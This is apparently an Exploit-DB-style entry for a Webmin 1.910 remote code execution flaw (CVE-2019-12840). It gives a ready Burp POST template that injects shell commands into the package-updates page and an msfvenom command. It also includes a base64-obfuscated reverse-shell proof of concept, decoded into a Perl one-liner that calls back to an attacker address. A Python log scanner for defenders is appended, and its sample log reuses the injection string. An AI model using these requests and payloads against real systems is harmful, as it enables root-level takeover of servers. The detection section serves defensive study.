Webmin 1.910 - Remote Code Execution using BurpSuite
# Exploit Title: Webmin 1.910 - Remote Code Execution abusing Package Updates using BurpSuite
# Date: 11/13/19
# Exploit Author: BoxBois
# Version: Webmin 1.910
# Tested on: Linux
# CVE: CVE-2019-12840
Exploit for the Webmin 1.910 Remote Command Execution vulnerability. If you have permission to log in and update packages, you can remotely execute code as the Webmin process user (usually root).
Use Burp to make a POST request to the page and paste the information below into the raw request. Replace the cookie's sid with your own sid, RHOST and RPORT with the victim IP and port, and PAYLOAD with your msfvenom-generated payload. Have a nc listener running and enjoy your shell.
Basic msfvenom reverse Perl payload creation command: "msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl"
-------------------------------------------------
POST /package-updates/update.cgi HTTP/1.1
Host: [RHOST]:[RPORT]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=[INPUT GOOD SID HERE]
Referer: [RHOST]:[RPORT]/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=[PAYLOAD HERE]
--------------------------------------------------------
Proof of concept
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.xxx:10000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=c6a571fc026f5565b3ea489081383bed
Referer: 10.10.10.xxx:10000/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7becho%2ccGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d%22
--------------------------------------------------------
POC Payload Info
URL decoded
| bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn}|{base64,-d}|{bash,-i}"
base64 decoded
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
all together decoded
| bash -c "{echo,perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'}|{base64,-d}|{bash,-i}"
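Added defender-side example, not part of the original exploit: a log scan that flags POSTs to /package-updates/update.cgi whose "u" value is not a plain package name (the exploit's second "u" value is a shell pipeline, as decoded above). The log format, a combined-style access log with the raw POST body quoted as the last field, is an assumption; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines (not real traffic). Assumed format: combined-style
# access log with the raw, still URL-encoded POST body as the last field.
SAMPLE_LOG = """\
10.10.14.5 - admin [13/Nov/2019:10:01:02 +0000] "POST /package-updates/update.cgi HTTP/1.1" 200 "u=acl%2Fapt&u=openssl"
10.10.14.5 - admin [13/Nov/2019:10:02:09 +0000] "POST /package-updates/update.cgi HTTP/1.1" 200 "u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7becho%2cQUFBQQ%3d%3d%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d%22"
10.10.14.5 - admin [13/Nov/2019:10:03:15 +0000] "GET /package-updates/?xnavigation=1 HTTP/1.1" 200 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) "(?P<body>[^"]*)"$'
)
# What a legitimate update.cgi "u" value looks like: a package name built from
# letters, digits and the punctuation Debian/RPM names allow, optionally
# qualified as name/source (the exploit's own first value is "acl/apt").
PACKAGE_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9.+_:~-]*(/[A-Za-z0-9.+_-]+)?$')


def suspicious_values(body: str) -> list:
    """Return every 'u' value in a URL-encoded POST body that is not a plain package name."""
    values = parse_qs(body, keep_blank_values=True).get("u", [])
    return [v for v in values if not PACKAGE_RE.match(v)]


def scan(log_text: str) -> list:
    """Return (ip, user, timestamp, bad_values) for each POST to update.cgi carrying shell-looking input."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines in a format we do not parse
        if m["method"] != "POST" or not m["path"].startswith("/package-updates/update.cgi"):
            continue
        bad = suspicious_values(m["body"])
        if bad:
            hits.append((m["ip"], m["user"], m["ts"], bad))
    return hits


if __name__ == "__main__":
    for ip, user, ts, bad in scan(SAMPLE_LOG):
        print(f"{ts} {ip} ({user}) update.cgi with non-package 'u' value(s): {bad!r}")
```

Webmin's own miniserv.log does not record POST bodies, so in practice the body field has to come from a reverse proxy or WAF log placed in front of Webmin.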